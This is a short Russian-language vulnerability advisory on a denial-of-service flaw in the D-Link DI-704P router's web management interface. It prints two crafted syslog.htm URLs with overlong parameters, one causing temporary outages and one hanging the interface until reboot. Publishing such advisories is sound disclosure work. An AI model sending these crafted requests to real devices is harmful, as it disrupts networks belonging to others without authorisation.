Отказ в обслуживании обнаружен в D-Link DI-704P Router. Удаленный авторизованный пользователь может завесить работу управляющего интерфейса. 

Удаленный авторизованный пользователь может послать специально сформированный URL к управляющему интерфейсу маршрутизатора, чтобы нарушить работу устройства. Следующий URL заставит устройство выполнить DNS запрос: 

http://192.168.0.1/syslog.htm?
D=AAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA

Результат DNS запроса будет следующий: 

AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAA AAAAAAAAAAAA AAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAA @xxxx.xx.comcast.net

Если представлено несколько подобных URL запросов, временный отказ в обслуживании
произойдет на маршрутизаторе. 

Следующий тип URL завесит управляющий интерфейс маршрутизатора, пока он не будет перезагружен: (работа маршрутизатора не нарушится): 

http://192.168.0.1/syslog.htm?

D=............................. ............................................
...........................................................................
............................................... ............................
...........................................................................
............................................................... ............
...........................................................................
...........................................................................
.. .........................................................................
...........................................................................
.................. .........................................................
....................

Уязвимость обнаружена в D-Link DI-704P.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии